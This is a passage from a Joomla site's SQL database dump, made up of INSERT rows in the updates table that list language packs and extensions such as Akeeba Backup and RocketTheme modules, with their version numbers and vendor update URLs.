Simplified','','pkg_zh-CN','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(7368,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(7369,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(7370,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(7371,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(7372,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(7373,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(7374,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(7375,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(7376,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(7377,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(7378,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(7379,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(7380,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(7381,57,0,'English US','','pkg_en-US','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(7382,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(7383,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(7384,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(7385,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(7386,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(7387,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(7388,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(7389,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(7390,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(7391,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(7392,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(7393,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(7394,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(7395,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(7396,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(7397,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(7398,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(7399,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(7400,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(7401,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(7402,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(7403,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n			https://www.akeebabackup.com/download/akeeba-backup/6-6-1.html			\n		',''),(7404,76,0,'Akeeba Frontend Framework (FEF)','Akeeba Frontend Framework (FEF)','file_fef','file','',1,'1.0.8','','http://cdn.akeebabackup.com/updates/fef.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3077',''),(7405,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.2.0FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(7406,101,0,'FOF 3.x Stable','FOF 3.x Stable','lib_fof30','library','',1,'3.5.0','','http://cdn.akeebabackup.com/updates/fof3_file.xml','\n			https://www.akeebabackup.com/download/fof3/3-5-0.html			\n		',''),(7407,1,0,'Joomla','','joomla','file','',0,'3.9.13','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(7408,1,0,'Joomla','','joomla','file','',0,'3.9.13','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(7409,1,0,'Joomla','','joomla','file','',0,'3.9.13','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(7410,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n			https://www.akeebabackup.com/download/akeeba-backup/6-6-1.html			\n		',''),(7411,1,0,'Joomla','','joomla','file','',0,'3.9.13','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(7412,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.7.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(7413,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.13.2','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(7414,3,0,'French','','pkg_fr-FR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(7415,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(7416,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(7417,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(7418,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(7419,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(7420,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(7421,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(7422,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(7423,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(7424,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(7425,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(7426,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.13.2','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(7427,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(7428,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(7429,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(7430,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(7431,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(7432,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(7433,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(7434,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(7435,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(7436,3,0,'English US','','pkg_en-US','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(7437,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(7438,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(7439,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(7440,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(7441,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(7442,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(7443,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(7444,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(7445,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(7446,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(7447,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(7448,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(7449,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(7450,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(7451,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(7452,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(7453,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(7454,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(7455,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(7456,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(7457,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(7458,1,0,'Joomla','','joomla','file','',0,'3.9.13','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(7459,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(7460,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.45','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(7461,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(7462,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(7463,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(7464,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(7465,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.7.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(7466,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.13.2','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(7467,57,0,'French','','pkg_fr-FR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(7468,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(7469,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(7470,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(7471,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(7472,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(7473,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(7474,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(7475,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(7476,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(7477,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(7478,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(7479,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.13.2','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(7480,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(7481,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(7482,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(7483,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(7484,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(7485,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(7486,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(7487,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(7488,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(7489,57,0,'English US','','pkg_en-US','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(7490,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(7491,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(7492,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(7493,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(7494,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(7495,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(7496,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(7497,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(7498,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(7499,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(7500,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(7501,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(7502,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(7503,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(7504,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(7505,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(7506,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(7507,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(7508,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(7509,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(7510,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(7511,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n			https://www.akeebabackup.com/download/akeeba-backup/6-6-1.html			\n		',''),(7512,76,0,'Akeeba Frontend Framework (FEF)','Akeeba Frontend Framework (FEF)','file_fef','file','',1,'1.0.8','','http://cdn.akeebabackup.com/updates/fef.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3077',''),(7513,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.2.0FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(7514,101,0,'FOF 3.x Stable','FOF 3.x Stable','lib_fof30','library','',1,'3.5.0','','http://cdn.akeebabackup.com/updates/fof3_file.xml','\n			https://www.akeebabackup.com/download/fof3/3-5-0.html			\n		',''),(7515,1,0,'Joomla','','joomla','file','',0,'3.9.13','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(7516,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.7.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(7517,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.13.2','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(7518,3,0,'French','','pkg_fr-FR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(7519,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(7520,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(7521,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(7522,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(7523,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(7524,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(7525,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(7526,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(7527,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(7528,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(7529,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(7530,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.13.2','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(7531,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(7532,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(7533,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(7534,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(7535,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(7536,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','','');
INSERT INTO `fw3gt_updates` VALUES (7537,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(7538,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(7539,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(7540,3,0,'English US','','pkg_en-US','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(7541,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(7542,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(7543,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(7544,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(7545,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(7546,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(7547,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(7548,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(7549,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(7550,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(7551,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(7552,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(7553,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(7554,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(7555,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(7556,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(7557,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(7558,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(7559,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(7560,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(7561,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(7562,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(7563,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.45','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(7564,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(7565,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(7566,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(7567,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(7568,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.7.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(7569,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.13.2','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(7570,57,0,'French','','pkg_fr-FR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(7571,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(7572,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(7573,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(7574,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(7575,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(7576,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(7577,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(7578,57,0,'Chinese 